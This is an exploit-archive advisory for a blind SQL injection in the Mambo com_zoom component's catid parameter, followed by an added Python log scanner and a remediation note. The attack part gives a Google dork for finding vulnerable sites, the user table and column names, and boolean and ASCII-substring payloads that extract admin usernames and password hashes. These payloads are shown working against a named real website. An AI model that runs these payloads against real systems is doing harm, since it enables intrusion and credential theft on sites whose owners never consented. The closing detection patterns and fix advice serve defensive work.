CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | N/A | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
N/A | High | Remote | 2009-09-11 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |

Mambo component com_zoom (catid) Blind SQL injection

Red n'black i dress eagle on my chest.
It's good to be an ALBANIAN
Keep my head up high for that flag i die.
Im proud to be an ALBANIAN

######
Author : boom3rang
Contact : boom3rang[at]live.com
Greetz : H!tm@N - KHG - cHs
R.I.P redc00de

-------------------------------------------------------------------

Affected software description

<name>zoom</name>
<creationDate>20/01/2004</creationDate>
<author>Mike de Boer</author>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.mikedeboer.nl</authorUrl>
<version>2.0</version>

-------------------------------------------------------------------

[~] SQLi : http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]

[~] Google Dork : inurl:com_zoom inurl:"imgid"

-------------------------------------------------------------------

[~] Table_NAME = mos_users
[~] Column_NAME = username - password

-------------------------------------------------------------------

[~] Admin Path : http://www.TARGET.com/administrator

=== = POC = ===

[~] Live Demo:

ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True
ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False

-------------------------------------------------------------------

[~] ASCII

index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

-------------------------------------------------------------------

[~] Live Demo ASCII

True
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

False
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97

As we can see, the first character of username is 'a': char(97)=a

Now you can change the second limit to find other characters. Good luck...
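
From the defender's side, the probes above stand out in web server logs because a legitimate `catid` is a plain integer. The following is an added example, not part of the original advisory: it flags com_zoom requests whose `catid` is not numeric and counts them per client. The Combined Log Format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Assumption: Apache/nginx Common or Combined Log Format.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r'[0-9]+')
# Tokens seen in the advisory's boolean and ASCII probes.
PROBE_RE = re.compile(r'/\*|\b(?:and|or|select|union)\b|ascii\s*\(|substring\s*\(', re.I)

def classify(line):
    """Return (client, catid, reason) for a suspicious com_zoom request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qs percent-decodes values, so %20-encoded probes are normalised here.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_zoom" not in (v.lower() for v in params.get("option", [])):
        return None
    for catid in params.get("catid", []):
        value = catid.strip()
        if INT_RE.fullmatch(value):  # a real category id is a plain integer
            continue
        reason = "sqli-probe" if PROBE_RE.search(value) else "non-numeric"
        return client, value, reason
    return None

def scan(lines):
    """Return flagged hits plus a per-client count (blind SQLi needs many requests)."""
    hits = [h for h in map(classify, lines) if h]
    return hits, Counter(client for client, _, _ in hits)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Sep/2009:10:00:01 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [11/Sep/2009:10:00:05 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* HTTP/1.1" 200 2048',
    '198.51.100.9 - - [11/Sep/2009:10:00:06 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21%20and%20ascii(substring((select%201),1,1))>96 HTTP/1.1" 200 5120',
    '203.0.113.12 - - [11/Sep/2009:10:01:00 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=abc HTTP/1.1" 200 2048',
    '203.0.113.5 - - [11/Sep/2009:10:02:00 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    hits, per_client = scan(SAMPLE_LOG)
    for client, value, reason in hits:
        print(f"{client}\t{reason}\t{value}")
    print(per_client.most_common())
```

Detection only narrows down who is probing. The root cause (CWE-89) is closed by casting `catid` to an integer or binding it as a query parameter before it reaches the SQL statement.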